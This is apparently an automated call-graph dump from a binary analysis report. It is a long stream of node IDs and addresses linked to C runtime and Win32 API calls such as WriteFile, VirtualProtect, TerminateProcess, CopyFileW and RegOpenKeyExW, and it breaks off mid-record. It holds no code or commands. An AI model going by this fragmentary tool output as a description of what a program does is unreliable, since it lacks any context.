47 API calls 93739->93742 93740->93719 93744 307c0e __dosmaperr 47 API calls 93741->93744 93746 30b0ee 93742->93746 93745 313bf2 __stbuf 47 API calls 93743->93745 93748 30b099 93744->93748 93749 30b12a 93745->93749 93750 307c0e __dosmaperr 47 API calls 93746->93750 93747->93743 93751 306e10 ___crtsetenv 8 API calls 93748->93751 93752 30b44b 93749->93752 93757 307a0d __beginthread 47 API calls 93749->93757 93753 30b0f5 93750->93753 93751->93765 93754 30b463 93752->93754 93755 30b7b8 WriteFile 93752->93755 93756 306e10 ___crtsetenv 8 API calls 93753->93756 93758 30b55a 93754->93758 93767 30b479 93754->93767 93759 30b7e1 GetLastError 93755->93759 93764 30b410 93755->93764 93756->93765 93760 30b150 GetConsoleMode 93757->93760 93769 30b663 93758->93769 93772 30b565 93758->93772 93759->93764 93760->93752 93762 30b189 93760->93762 93761 30b81b 93763 307c0e __dosmaperr 47 API calls 93761->93763 93761->93765 93762->93752 93766 30b199 GetConsoleCP 93762->93766 93770 30b843 93763->93770 93764->93761 93764->93765 93771 30b7f7 93764->93771 93765->93736 93766->93764 93792 30b1c2 93766->93792 93767->93761 93768 30b4e9 WriteFile 93767->93768 93768->93759 93773 30b526 93768->93773 93769->93761 93774 30b6d8 WideCharToMultiByte 93769->93774 93775 307bda __dosmaperr 47 API calls 93770->93775 93776 30b812 93771->93776 93777 30b7fe 93771->93777 93772->93761 93778 30b5de WriteFile 93772->93778 93773->93764 93773->93767 93786 30b555 93773->93786 93774->93759 93789 30b71f 93774->93789 93775->93765 93780 307bed __dosmaperr 47 API calls 93776->93780 93779 307c0e __dosmaperr 47 API calls 93777->93779 93778->93759 93781 30b62d 93778->93781 93783 30b803 93779->93783 93780->93765 93781->93764 93781->93772 93781->93786 93782 30b727 WriteFile 93784 30b77a GetLastError 93782->93784 93782->93789 93785 307bda __dosmaperr 47 API calls 93783->93785 93784->93789 93785->93765 93786->93764 93787 301688 __chsize_nolock 57 API calls 93787->93792 93788 315884 WriteConsoleW CreateFileW __chsize_nolock 93794 30b2f6 93788->93794 93789->93764 93789->93769 93789->93782 93789->93786 93790 3140f7 59 API calls __chsize_nolock 93790->93792 93791 30b28f WideCharToMultiByte 93791->93764 93793 30b2ca WriteFile 93791->93793 93792->93764 93792->93787 93792->93790 93792->93791 93792->93794 93793->93759 93793->93794 93794->93759 93794->93764 93794->93788 93794->93792 93795 30b321 WriteFile 93794->93795 93795->93759 93795->93794 93796->93704 93797->93717 93798->93720 93799->93719 93800->93717 93801->93707 93802->93711 93803->93717 93804->93670 93805->93672 93828 30aba4 93806->93828 93808 30eb00 93841 30ab1e 48 API calls __dosmaperr 93808->93841 93810 30eaaa 93810->93808 93811 30aba4 __chsize_nolock 47 API calls 93810->93811 93820 30eade 93810->93820 93813 30ead5 93811->93813 93812 30aba4 __chsize_nolock 47 API calls 93814 30eaea CloseHandle 93812->93814 93817 30aba4 __chsize_nolock 47 API calls 93813->93817 93814->93808 93818 30eaf6 GetLastError 93814->93818 93815 30eb2a 93815->93694 93816 30eb08 93816->93815 93842 307bed 47 API calls __dosmaperr 93816->93842 93817->93820 93818->93808 93820->93808 93820->93812 93821->93678 93822->93691 93823->93694 93824->93691 93825->93682 93826->93686 93827->93691 93829 30abc4 93828->93829 93830 30abaf 93828->93830 93832 307bda __dosmaperr 47 API calls 93829->93832 93836 30abe9 93829->93836 93831 307bda __dosmaperr 47 API calls 93830->93831 93833 30abb4 93831->93833 93834 30abf3 93832->93834 93835 307c0e __dosmaperr 47 API calls 93833->93835 93837 307c0e __dosmaperr 47 API calls 93834->93837 93838 30abbc 93835->93838 93836->93810 93839 30abfb 93837->93839 93838->93810 93840 306e10 ___crtsetenv 8 API calls 93839->93840 93840->93838 93841->93816 93842->93815 93843->93271 93844->93282 93845->93282 93846->93281 93847->93295 93848->93297 93849->93294 93850->93302 93851->93305 93852->93322 93853->93320 93855 30f8a0 __ftell_nolock 93854->93855 93856 2e40b4 GetLongPathNameW 93855->93856 93857 2e6a63 48 API calls 93856->93857 93858 2e40dc 93857->93858 93859 2e49a0 93858->93859 93860 2ed7f7 48 API calls 93859->93860 93861 2e49b2 93860->93861 93862 2e660f 49 API calls 93861->93862 93863 2e49bd 93862->93863 93864 2e49c8 93863->93864 93868 352e35 93863->93868 93865 2e64cf 48 API calls 93864->93865 93867 2e49d4 93865->93867 93906 2e28a6 93867->93906 93870 352e4f 93868->93870 93912 2fd35e 60 API calls 93868->93912 93871 2e49e7 Mailbox 93871->93145 93873 2e41a9 136 API calls 93872->93873 93874 2e415e 93873->93874 93875 353489 93874->93875 93876 2e41a9 136 API calls 93874->93876 93877 32c396 122 API calls 93875->93877 93878 2e4172 93876->93878 93879 35349e 93877->93879 93878->93875 93880 2e417a 93878->93880 93881 3534a2 93879->93881 93882 3534bf 93879->93882 93884 2e4186 93880->93884 93885 3534aa 93880->93885 93886 2e4252 84 API calls 93881->93886 93883 2ff4ea 48 API calls 93882->93883 93905 353504 Mailbox 93883->93905 93913 2ec833 93884->93913 94015 326b49 87 API calls _wprintf 93885->94015 93886->93885 93890 3534b8 93890->93882 93891 3536b4 93892 301c9d _free 47 API calls 93891->93892 93893 3536bc 93892->93893 93894 2e4252 84 API calls 93893->93894 93899 3536c5 93894->93899 93898 301c9d _free 47 API calls 93898->93899 93899->93898 93900 2e4252 84 API calls 93899->93900 94019 3225b5 86 API calls 4 library calls 93899->94019 93900->93899 93902 2ece19 48 API calls 93902->93905 93905->93891 93905->93899 93905->93902 94001 2eba85 93905->94001 94009 2e4dd9 93905->94009 94016 322551 48 API calls ___crtGetEnvironmentStringsW 93905->94016 94017 322472 60 API calls 2 library calls 93905->94017 94018 329c12 48 API calls 93905->94018 93907 2e28b8 93906->93907 93911 2e28d7 ___crtGetEnvironmentStringsW 93906->93911 93909 2ff4ea 48 API calls 93907->93909 93908 2ff4ea 48 API calls 93910 2e28ee 93908->93910 93909->93911 93910->93871 93911->93908 93912->93868 93914 2ec843 __ftell_nolock 93913->93914 93915 353095 93914->93915 93916 2ec860 93914->93916 94044 3225b5 86 API calls 4 library calls 93915->94044 94025 2e48ba 49 API calls 93916->94025 93919 2ec882 94026 2e4550 56 API calls 93919->94026 93920 3530a8 94045 3225b5 86 API calls 4 library calls 93920->94045 93922 2ec897 93922->93920 93924 2ec89f 93922->93924 93926 2ed7f7 48 API calls 93924->93926 93925 3530c4 93928 2ec90c 93925->93928 93927 2ec8ab 93926->93927 94027 2fe968 49 API calls __ftell_nolock 93927->94027 93930 3530d7 93928->93930 93931 2ec91a 93928->93931 93934 2e4907 CloseHandle 93930->93934 94030 301dfc 93931->94030 93932 2ec8b7 93935 2ed7f7 48 API calls 93932->93935 93936 3530e3 93934->93936 93937 2ec8c3 93935->93937 93938 2e41a9 136 API calls 93936->93938 93939 2e660f 49 API calls 93937->93939 93940 35310d 93938->93940 93941 2ec8d1 93939->93941 93943 353136 93940->93943 93947 32c396 122 API calls 93940->93947 94028 2feb66 SetFilePointerEx ReadFile 93941->94028 93942 2ec943 _wcscat _wcscpy 93946 2ec96d SetCurrentDirectoryW 93942->93946 94046 3225b5 86 API calls 4 library calls 93943->94046 93951 2ff4ea 48 API calls 93946->93951 93952 353129 93947->93952 93948 2ec8fd 94029 2e46ce SetFilePointerEx SetFilePointerEx 93948->94029 93950 35314d 93960 2ecad1 Mailbox 93950->93960 93953 2ec988 93951->93953 93954 353131 93952->93954 93955 353152 93952->93955 93957 2e47b7 48 API calls 93953->93957 93958 2e4252 84 API calls 93954->93958 93956 2e4252 84 API calls 93955->93956 93959 353157 93956->93959 93970 2ec993 Mailbox __NMSG_WRITE 93957->93970 93958->93943 93961 2ff4ea 48 API calls 93959->93961 94020 2e48dd 93960->94020 93968 353194 93961->93968 93962 2eca9d 94040 2e4907 93962->94040 93966 2e3d98 93966->93019 93966->93041 93967 2ecaa9 SetCurrentDirectoryW 93967->93960 93971 2eba85 48 API calls 93968->93971 93970->93962 93983 35345f 93970->93983 93984 2ece19 48 API calls 93970->93984 93987 353467 93970->93987 94033 2eb337 56 API calls _wcscpy 93970->94033 94034 2fc258 GetStringTypeW 93970->94034 94035 2ecb93 59 API calls __wcsnicmp 93970->94035 94036 2ecb5a GetStringTypeW __NMSG_WRITE 93970->94036 94037 3016d0 GetStringTypeW __wtof_l 93970->94037 94038 2ecc24 162 API calls 3 library calls 93970->94038 94039 2fc682 48 API calls 93970->94039 93996 3531dd Mailbox 93971->93996 93973 3533ce 94051 329b72 48 API calls 93973->94051 93977 353480 93977->93962 93978 3533f0 94052 3429e8 48 API calls ___crtGetEnvironmentStringsW 93978->94052 93980 3533fd 93981 301c9d _free 47 API calls 93980->93981 93981->93960 94054 32240b 48 API calls 3 library calls 93983->94054 93984->93970 93986 2eba85 48 API calls 93986->93996 94055 3225b5 86 API calls 4 library calls 93987->94055 93992 2ece19 48 API calls 93992->93996 93995 353420 94053 3225b5 86 API calls 4 library calls 93995->94053 93996->93973 93996->93986 93996->93992 93996->93995 94047 322551 48 API calls ___crtGetEnvironmentStringsW 93996->94047 94048 322472 60 API calls 2 library calls 93996->94048 94049 329c12 48 API calls 93996->94049 94050 2fc682 48 API calls 93996->94050 93998 353439 93999 301c9d _free 47 API calls 93998->93999 94000 35344c 93999->94000 94000->93960 94002 2ebb25 94001->94002 94006 2eba98 ___crtGetEnvironmentStringsW 94001->94006 94004 2ff4ea 48 API calls 94002->94004 94003 2ff4ea 48 API calls 94005 2eba9f 94003->94005 94004->94006 94007 2ff4ea 48 API calls 94005->94007 94008 2ebac8 94005->94008 94006->94003 94007->94008 94008->93905 94010 2e4dec 94009->94010 94013 2e4e9a 94009->94013 94011 2ff4ea 48 API calls 94010->94011 94014 2e4e1e 94010->94014 94011->94014 94012 2ff4ea 48 API calls 94012->94014 94013->93905 94014->94012 94014->94013 94015->93890 94016->93905 94017->93905 94018->93905 94019->93899 94021 2e4907 CloseHandle 94020->94021 94022 2e48e5 Mailbox 94021->94022 94023 2e4907 CloseHandle 94022->94023 94024 2e48fc 94023->94024 94024->93966 94025->93919 94026->93922 94027->93932 94028->93948 94029->93928 94056 301e46 94030->94056 94033->93970 94034->93970 94035->93970 94036->93970 94037->93970 94038->93970 94039->93970 94041 2e4920 94040->94041 94042 2e4911 94040->94042 94041->94042 94043 2e4925 CloseHandle 94041->94043 94042->93967 94043->94042 94044->93920 94045->93925 94046->93950 94047->93996 94048->93996 94049->93996 94050->93996 94051->93978 94052->93980 94053->93998 94054->93987 94055->93977 94057 301e61 94056->94057 94060 301e55 94056->94060 94080 307c0e 47 API calls __getptd_noexit 94057->94080 94059 302019 94064 301e41 94059->94064 94081 306e10 8 API calls ___crtsetenv 94059->94081 94060->94057 94071 301ed4 94060->94071 94075 309d6b 47 API calls 2 library calls 94060->94075 94063 301fa0 94063->94057 94063->94064 94066 301fb0 94063->94066 94064->93942 94065 301f5f 94065->94057 94067 301f7b 94065->94067 94077 309d6b 47 API calls 2 library calls 94065->94077 94079 309d6b 47 API calls 2 library calls 94066->94079 94067->94057 94067->94064 94070 301f91 94067->94070 94078 309d6b 47 API calls 2 library calls 94070->94078 94071->94057 94074 301f41 94071->94074 94076 309d6b 47 API calls 2 library calls 94071->94076 94074->94063 94074->94065 94075->94071 94076->94074 94077->94067 94078->94064 94079->94064 94080->94059 94081->94064 94083 2e4c8b 94082->94083 94088 2e4d94 94082->94088 94084 2ff4ea 48 API calls 94083->94084 94083->94088 94085 2e4cb2 94084->94085 94086 2ff4ea 48 API calls 94085->94086 94092 2e4d22 94086->94092 94088->93151 94090 2e4dd9 48 API calls 94090->94092 94091 2eba85 48 API calls 94091->94092 94092->94088 94092->94090 94092->94091 94095 2eb470 91 API calls 2 library calls 94092->94095 94096 329af1 48 API calls 94092->94096 94093->93153 94094->93155 94095->94092 94096->94092 94098 2e403c LoadImageW 94097->94098 94099 35418d EnumResourceNamesW 94097->94099 94100 2e3ee1 RegisterClassExW 94098->94100 94099->94100 94101 2e3f53 7 API calls 94100->94101 94101->93170 94103 2ef130 94102->94103 94110 2ef199 94103->94110 94212 2efe30 346 API calls __cinit 94103->94212 94104 2ef595 94113 2ed7f7 48 API calls 94104->94113 94134 2ef431 Mailbox 94104->94134 94106 3587c8 94216 32cc5c 86 API calls 4 library calls 94106->94216 94107 358728 94107->94110 94213 32cc5c 86 API calls 4 library calls 94107->94213 94108 2ef418 94120 358b1b 94108->94120 94108->94134 94135 2ef6aa 94108->94135 94110->94104 94114 2ed7f7 48 API calls 94110->94114 94142 2ef229 94110->94142 94156 2ef3dd 94110->94156 94111 2efe30 346 API calls 94111->94134 94115 3587a3 94113->94115 94116 358772 94114->94116 94215 300f0a 52 API calls __cinit 94115->94215 94214 300f0a 52 API calls __cinit 94116->94214 94117 32cc5c 86 API calls 94117->94134 94119 2ef3f2 94119->94108 94217 329af1 48 API calls 94119->94217 94136 358b2c 94120->94136 94137 358bcf 94120->94137 94121 2ef770 94128 358a45 94121->94128 94149 2ef77a 94121->94149 94123 2ed6e9 55 API calls 94123->94134 94125 358c53 94232 32cc5c 86 API calls 4 library calls 94125->94232 94126 358810 94218 33eef8 346 API calls 94126->94218 94224 2fc1af 48 API calls 94128->94224 94129 358b7e 94227 33e40a 346 API calls Mailbox 94129->94227 94134->94111 94134->94117 94134->94123 94134->94125 94134->94129 94138 358beb 94134->94138 94144 2ef537 Mailbox 94134->94144 94147 2f1b90 48 API calls 94134->94147 94152 2efce0 94134->94152 94211 2edd47 48 API calls ___crtGetEnvironmentStringsW 94134->94211 94225 3197ed InterlockedDecrement 94134->94225 94233 2fc1af 48 API calls 94134->94233 94135->94121 94135->94134 94135->94144 94135->94152 94210 2efe30 346 API calls __cinit 94135->94210 94226 33f5ee 346 API calls 94136->94226 94229 32cc5c 86 API calls 4 library calls 94137->94229 94230 33bdbd 346 API calls Mailbox 94138->94230 94142->94104 94142->94108 94142->94134 94142->94156 94143 358823 94143->94108 94151 35884b 94143->94151 94144->93195 94146 2f1b90 48 API calls 94146->94134 94147->94134 94148 358c00 94148->94144 94231 32cc5c 86 API calls 4 library calls 94148->94231 94149->94146 94219 33ccdc 48 API calls 94151->94219 94152->94144 94228 32cc5c 86 API calls 4 library calls 94152->94228 94156->94106 94156->94119 94156->94134 94157 358857 94159 358865 94157->94159 94160 3588aa 94157->94160 94220 329b72 48 API calls 94159->94220 94163 3588a0 Mailbox 94160->94163 94221 32a69d 48 API calls 94160->94221 94223 2efe30 346 API calls __cinit 94163->94223 94165 3588e7 94222 2ebc74 48 API calls 94165->94222 94168 2f479f 94167->94168 94169 2f4637 94167->94169 94172 2ece19 48 API calls 94168->94172 94170 356e05 94169->94170 94171 2f4643 94169->94171 94285 33e822 346 API calls Mailbox 94170->94285 94284 2f4300 346 API calls ___crtGetEnvironmentStringsW 94171->94284 94179 2f46e4 Mailbox 94172->94179 94175 356e11 94176 2f4739 Mailbox 94175->94176 94286 32cc5c 86 API calls 4 library calls 94175->94286 94176->93195 94178 2f4659 94178->94175 94178->94176 94178->94179 94182 2e4252 84 API calls 94179->94182 94234 340d1d 94179->94234 94237 340d09 94179->94237 94240 326524 94179->94240 94243 32fa0c 94179->94243 94182->94176 94186 35df42 94185->94186 94187 2fe253 94185->94187 94188 35df77 94186->94188 94189 35df59 TranslateAcceleratorW 94186->94189 94187->93195 94189->94187 94191 2fdca3 94190->94191 94192 2fdc71 94190->94192 94191->93195 94192->94191 94193 2fdc96 IsDialogMessageW 94192->94193 94194 35dd1d GetClassLongW 94192->94194 94193->94191 94193->94192 94194->94192 94194->94193 94195->93195 94196->93195 94197->93195 94198->93177 94199->93180 94200->93185 94201->93195 94202->93195 94203->93231 94204->93231 94205->93231 94206->93195 94207->93231 94208->93231 94209->93231 94210->94135 94211->94134 94212->94107 94213->94110 94214->94142 94215->94134 94216->94144 94217->94126 94218->94143 94219->94157 94220->94163 94221->94165 94222->94163 94223->94144 94224->94134 94225->94134 94226->94134 94227->94152 94228->94144 94229->94144 94230->94148 94231->94144 94232->94144 94233->94134 94287 33f8ae 94234->94287 94236 340d2d 94236->94176 94238 33f8ae 129 API calls 94237->94238 94239 340d19 94238->94239 94239->94176 94373 326ca9 GetFileAttributesW 94240->94373 94244 32fa1c __ftell_nolock 94243->94244 94245 32fa44 94244->94245 94438 2ed286 48 API calls 94244->94438 94247 2e936c 81 API calls 94245->94247 94248 32fa5e 94247->94248 94249 32fa80 94248->94249 94250 32fb68 94248->94250 94260 32fb92 94248->94260 94251 2e936c 81 API calls 94249->94251 94252 2e41a9 136 API calls 94250->94252 94258 32fa8c _wcscpy _wcschr 94251->94258 94253 32fb79 94252->94253 94254 32fb8e 94253->94254 94255 2e41a9 136 API calls 94253->94255 94256 2e936c 81 API calls 94254->94256 94254->94260 94255->94254 94257 32fbc7 94256->94257 94259 301dfc __wsplitpath 47 API calls 94257->94259 94263 32fab0 _wcscat _wcscpy 94258->94263 94266 32fade _wcscat 94258->94266 94268 32fbeb _wcscat _wcscpy 94259->94268 94260->94176 94261 2e936c 81 API calls 94262 32fafc _wcscpy 94261->94262 94439 3272cb GetFileAttributesW 94262->94439 94265 2e936c 81 API calls 94263->94265 94265->94266 94266->94261 94267 32fb1c __NMSG_WRITE 94267->94260 94269 2e936c 81 API calls 94267->94269 94272 2e936c 81 API calls 94268->94272 94270 32fb48 94269->94270 94440 3260dd 77 API calls 4 library calls 94270->94440 94274 32fc82 94272->94274 94273 32fb5c 94273->94260 94377 32690b 94274->94377 94276 32fca2 94277 326524 3 API calls 94276->94277 94278 32fcb1 94277->94278 94279 2e936c 81 API calls 94278->94279 94283 32fce2 94278->94283 94280 32fccb 94279->94280 94383 32bfa4 94280->94383 94282 2e4252 84 API calls 94282->94260 94283->94282 94284->94178 94285->94175 94286->94176 94288 2e936c 81 API calls 94287->94288 94289 33f8ea 94288->94289 94294 33f92c Mailbox 94289->94294 94323 340567 94289->94323 94291 33fb8b 94292 33fcfa 94291->94292 94299 33fb95 94291->94299 94359 340688 89 API calls Mailbox 94292->94359 94294->94236 94296 33fd07 94298 33fd13 94296->94298 94296->94299 94297 33f984 Mailbox 94297->94291 94297->94294 94300 2e936c 81 API calls 94297->94300 94354 3429e8 48 API calls ___crtGetEnvironmentStringsW 94297->94354 94355 33fda5 60 API calls 2 library calls 94297->94355 94298->94294 94336 33f70a 94299->94336 94300->94297 94305 33fbc9 94350 2fed18 94305->94350 94308 33fbe3 94356 32cc5c 86 API calls 4 library calls 94308->94356 94309 33fbfd 94311 2fc050 48 API calls 94309->94311 94313 33fc14 94311->94313 94312 33fbee GetCurrentProcess TerminateProcess 94312->94309 94314 2f1b90 48 API calls 94313->94314 94322 33fc3e 94313->94322 94316 33fc2d 94314->94316 94315 33fd65 94315->94294 94319 33fd7e FreeLibrary 94315->94319 94357 34040f 105 API calls _free 94316->94357 94317 2f1b90 48 API calls 94317->94322 94319->94294 94322->94315 94322->94317 94358 2edcae 50 API calls Mailbox 94322->94358 94360 34040f 105 API calls _free 94322->94360 94324 2ebdfa 48 API calls 94323->94324 94325 340582 CharLowerBuffW 94324->94325 94361 321f11 94325->94361 94329 2ed7f7 48 API calls 94330 3405bb 94329->94330 94368 2e69e9 48 API calls ___crtGetEnvironmentStringsW 94330->94368 94332 34061a Mailbox 94332->94297 94333 3405d2 94334 2eb18b 48 API calls 94333->94334 94335 3405de Mailbox 94334->94335 94335->94332 94369 33fda5 60 API calls 2 library calls 94335->94369 94337 33f725 94336->94337 94338 33f77a 94336->94338 94339 2ff4ea 48 API calls 94337->94339 94342 340828 94338->94342 94341 33f747 94339->94341 94340 2ff4ea 48 API calls 94340->94341 94341->94338 94341->94340 94343 340a53 Mailbox 94342->94343 94346 34084b _strcat _wcscpy __NMSG_WRITE 94342->94346 94343->94305 94344 2ed286 48 API calls 94344->94346 94345 2ecf93 58 API calls 94345->94346 94346->94343 94346->94344 94346->94345 94347 2e936c 81 API calls 94346->94347 94348 30395c 47 API calls __crtGetStringTypeA_stat 94346->94348 94372 328035 50 API calls __NMSG_WRITE 94346->94372 94347->94346 94348->94346 94351 2fed2d 94350->94351 94352 2fedc5 VirtualProtect 94351->94352 94353 2fed93 94351->94353 94352->94353 94353->94308 94353->94309 94354->94297 94355->94297 94356->94312 94357->94322 94358->94322 94359->94296 94360->94322 94362 321f3b __NMSG_WRITE 94361->94362 94363 321f79 94362->94363 94365 321f6f 94362->94365 94366 321ffa 94362->94366 94363->94329 94363->94335 94365->94363 94370 2fd37a 60 API calls 94365->94370 94366->94363 94371 2fd37a 60 API calls 94366->94371 94368->94333 94369->94332 94370->94365 94371->94366 94372->94346 94374 326529 94373->94374 94375 326cc4 FindFirstFileW 94373->94375 94374->94176 94375->94374 94376 326cd9 FindClose 94375->94376 94376->94374 94378 326918 _wcschr __ftell_nolock 94377->94378 94379 301dfc __wsplitpath 47 API calls 94378->94379 94382 32692e _wcscat _wcscpy 94378->94382 94380 32695d 94379->94380 94381 301dfc __wsplitpath 47 API calls 94380->94381 94381->94382 94382->94276 94384 32bfb1 __ftell_nolock 94383->94384 94385 2ff4ea 48 API calls 94384->94385 94386 32c00e 94385->94386 94387 2e47b7 48 API calls 94386->94387 94388 32c018 94387->94388 94389 32bdb4 GetSystemTimeAsFileTime 94388->94389 94390 32c023 94389->94390 94391 2e4517 83 API calls 94390->94391 94392 32c036 _wcscmp 94391->94392 94393 32c107 94392->94393 94394 32c05a 94392->94394 94395 32c56d 94 API calls 94393->94395 94396 32c56d 94 API calls 94394->94396 94411 32c0d3 _wcscat 94395->94411 94397 32c05f 94396->94397 94398 301dfc __wsplitpath 47 API calls 94397->94398 94400 32c110 94397->94400 94403 32c088 _wcscat _wcscpy 94398->94403 94399 2e44ed 64 API calls 94401 32c12c 94399->94401 94400->94283 94402 2e44ed 64 API calls 94401->94402 94404 32c13c 94402->94404 94406 301dfc __wsplitpath 47 API calls 94403->94406 94405 2e44ed 64 API calls 94404->94405 94407 32c157 94405->94407 94406->94411 94408 2e44ed 64 API calls 94407->94408 94409 32c167 94408->94409 94410 2e44ed 64 API calls 94409->94410 94412 32c182 94410->94412 94411->94399 94411->94400 94413 2e44ed 64 API calls 94412->94413 94414 32c192 94413->94414 94415 2e44ed 64 API calls 94414->94415 94416 32c1a2 94415->94416 94417 2e44ed 64 API calls 94416->94417 94418 32c1b2 94417->94418 94441 32c71a GetTempPathW GetTempFileNameW 94418->94441 94420 32c1be 94421 303499 117 API calls 94420->94421 94431 32c1cf 94421->94431 94422 32c289 94423 3035e4 __fcloseall 83 API calls 94422->94423 94424 32c294 94423->94424 94426 32c29a DeleteFileW 94424->94426 94427 32c2ae 94424->94427 94425 2e44ed 64 API calls 94425->94431 94426->94400 94428 32c342 CopyFileW 94427->94428 94433 32c2b8 94427->94433 94429 32c36a DeleteFileW 94428->94429 94430 32c358 DeleteFileW 94428->94430 94455 32c6d9 CreateFileW 94429->94455 94430->94400 94431->94400 94431->94422 94431->94425 94442 302aae 94431->94442 94458 32b965 118 API calls __fcloseall 94433->94458 94436 32c32d 94436->94429 94437 32c331 DeleteFileW 94436->94437 94437->94400 94438->94245 94439->94267 94440->94273 94441->94420 94443 302aba type_info::_Type_info_dtor 94442->94443 94444 302ad4 94443->94444 94445 302aec 94443->94445 94446 302ae4 type_info::_Type_info_dtor 94443->94446 94471 307c0e 47 API calls __getptd_noexit 94444->94471 94447 304e1c __lock_file 48 API calls 94445->94447 94446->94431 94449 302af2 94447->94449 94459 302957 94449->94459 94450 302ad9 94472 306e10 8 API calls ___crtsetenv 94450->94472 94456 32c715 94455->94456 94457 32c6ff SetFileTime CloseHandle 94455->94457 94456->94400 94457->94456 94458->94436 94462 302966 94459->94462 94465 302984 94459->94465 94460 302974 94474 307c0e 47 API calls __getptd_noexit 94460->94474 94462->94460 94462->94465 94469 30299c ___crtGetEnvironmentStringsW 94462->94469 94463 302979 94475 306e10 8 API calls ___crtsetenv 94463->94475 94473 302b24 LeaveCriticalSection LeaveCriticalSection _fseek 94465->94473 94467 302c84 __flush 78 API calls 94467->94469 94468 302933 _fprintf 47 API calls 94468->94469 94469->94465 94469->94467 94469->94468 94470 30af61 __flswbuf 78 API calls 94469->94470 94476 308e63 78 API calls 6 library calls 94469->94476 94470->94469 94471->94450 94472->94446 94473->94446 94474->94463 94475->94465 94476->94469 94477 35197b 94482 2fdd94 94477->94482 94481 35198a 94483 2ff4ea 48 API calls 94482->94483 94484 2fdd9c 94483->94484 94485 2fddb0 94484->94485 94490 2fdf3d 94484->94490 94489 300f0a 52 API calls __cinit 94485->94489 94489->94481 94491 2fdda8 94490->94491 94492 2fdf46 94490->94492 94494 2fddc0 94491->94494 94522 300f0a 52 API calls __cinit 94492->94522 94495 2ed7f7 48 API calls 94494->94495 94496 2fddd7 GetVersionExW 94495->94496 94497 2e6a63 48 API calls 94496->94497 94498 2fde1a 94497->94498 94523 2fdfb4 94498->94523 94501 2e6571 48 API calls 94503 2fde2e 94501->94503 94505 3524c8 94503->94505 94527 2fdf77 94503->94527 94506 2fdea4 GetCurrentProcess 94536 2fdf5f LoadLibraryA GetProcAddress 94506->94536 94508 2fdee3 94530 2fe00c 94508->94530 94509 2fdf31 GetSystemInfo 94511 2fdf0e 94509->94511 94510 2fdebb 94510->94508 94510->94509 94513 2fdf1c FreeLibrary 94511->94513 94514 2fdf21 94511->94514 94513->94514 94514->94485 94516 2fdf29 GetSystemInfo 94518 2fdf03 94516->94518 94517 2fdef9 94533 2fdff4 94517->94533 94518->94511 94520 2fdf09 FreeLibrary 94518->94520 94520->94511 94522->94491 94524 2fdfbd 94523->94524 94525 2eb18b 48 API calls 94524->94525 94526 2fde22 94525->94526 94526->94501 94537 2fdf89 94527->94537 94541 2fe01e 94530->94541 94534 2fe00c 2 API calls 94533->94534 94535 2fdf01 GetNativeSystemInfo 94534->94535 94535->94518 94536->94510 94538 2fdea0 94537->94538 94539 2fdf92 LoadLibraryA 94537->94539 94538->94506 94538->94510 94539->94538 94540 2fdfa3 GetProcAddress 94539->94540 94540->94538 94542 2fdef1 94541->94542 94543 2fe027 LoadLibraryA 94541->94543 94542->94516 94542->94517 94543->94542 94544 2fe038 GetProcAddress 94543->94544 94544->94542 94545 3519cb 94550 2e2322 94545->94550 94547 3519d1 94583 300f0a 52 API calls __cinit 94547->94583 94549 3519db 94551 2e2344 94550->94551 94584 2e26df 94551->94584 94556 2ed7f7 48 API calls 94557 2e2384 94556->94557 94558 2ed7f7 48 API calls 94557->94558 94559 2e238e 94558->94559 94560 2ed7f7 48 API calls 94559->94560 94561 2e2398 94560->94561 94562 2ed7f7 48 API calls 94561->94562 94563 2e23de 94562->94563 94564 2ed7f7 48 API calls 94563->94564 94565 2e24c1 94564->94565 94592 2e263f 94565->94592 94569 2e24f1 94570 2ed7f7 48 API calls 94569->94570 94571 2e24fb 94570->94571 94621 2e2745 94571->94621 94573 2e2546 94574 2e2556 GetStdHandle 94573->94574 94575 35501d 94574->94575 94576 2e25b1 94574->94576 94575->94576 94578 355026 94575->94578 94577 2e25b7 CoInitialize 94576->94577 94577->94547 94628 3292d4 53 API calls 94578->94628 94580 35502d 94629 3299f9 CreateThread 94580->94629 94582 355039 CloseHandle 94582->94577 94583->94549 94630 2e2854 94584->94630 94587 2e6a63 48 API calls 94588 2e234a 94587->94588 94589 2e272e 94588->94589 94644 2e27ec 6 API calls 94589->94644 94591 2e237a 94591->94556 94593 2ed7f7 48 API calls 94592->94593 94594 2e264f 94593->94594 94595 2ed7f7 48 API calls 94594->94595 94596 2e2657 94595->94596 94645 2e26a7 94596->94645 94599 2e26a7 48 API calls 94600 2e2667 94599->94600 94601 2ed7f7 48 API calls 94600->94601 94602 2e2672 94601->94602 94603 2ff4ea 48 API calls 94602->94603 94604 2e24cb 94603->94604 94605 2e22a4 94604->94605 94606 2e22b2 94605->94606 94607 2ed7f7 48 API calls 94606->94607 94608 2e22bd 94607->94608 94609 2ed7f7 48 API calls 94608->94609 94610 2e22c8 94609->94610 94611 2ed7f7 48 API calls 94610->94611 94612 2e22d3 94611->94612 94613 2ed7f7 48 API calls 94612->94613 94614 2e22de 94613->94614 94615 2e26a7 48 API calls 94614->94615 94616 2e22e9 94615->94616 94617 2ff4ea 48 API calls 94616->94617 94618 2e22f0 94617->94618 94619 351fe7 94618->94619 94620 2e22f9 RegisterWindowMessageW 94618->94620 94620->94569 94622 355f4d 94621->94622 94623 2e2755 94621->94623 94650 32c942 50 API calls 94622->94650 94624 2ff4ea 48 API calls 94623->94624 94626 2e275d 94624->94626 94626->94573 94627 355f58 94628->94580 94629->94582 94651 3299df 54 API calls 94629->94651 94637 2e2870 94630->94637 94633 2e2870 48 API calls 94634 2e2864 94633->94634 94635 2ed7f7 48 API calls 94634->94635 94636 2e2716 94635->94636 94636->94587 94638 2ed7f7 48 API calls 94637->94638 94639 2e287b 94638->94639 94640 2ed7f7 48 API calls 94639->94640 94641 2e2883 94640->94641 94642 2ed7f7 48 API calls 94641->94642 94643 2e285c 94642->94643 94643->94633 94644->94591 94646 2ed7f7 48 API calls 94645->94646 94647 2e26b0 94646->94647 94648 2ed7f7 48 API calls 94647->94648 94649 2e265f 94648->94649 94649->94599 94650->94627 94652 3519ba 94657 2fc75a 94652->94657 94656 3519c9 94658 2ed7f7 48 API calls 94657->94658 94659 2fc7c8 94658->94659 94665 2fd26c 94659->94665 94662 2fc865 94663 2fc881 94662->94663 94668 2fd1fa 48 API calls ___crtGetEnvironmentStringsW 94662->94668 94664 300f0a 52 API calls __cinit 94663->94664 94664->94656 94669 2fd298 94665->94669 94668->94662 94670 2fd28b 94669->94670 94671 2fd2a5 94669->94671 94670->94662 94671->94670 94672 2fd2ac RegOpenKeyExW 94671->94672 94672->94670 94673 2fd2c6 RegQueryValueExW 94672->94673 94674 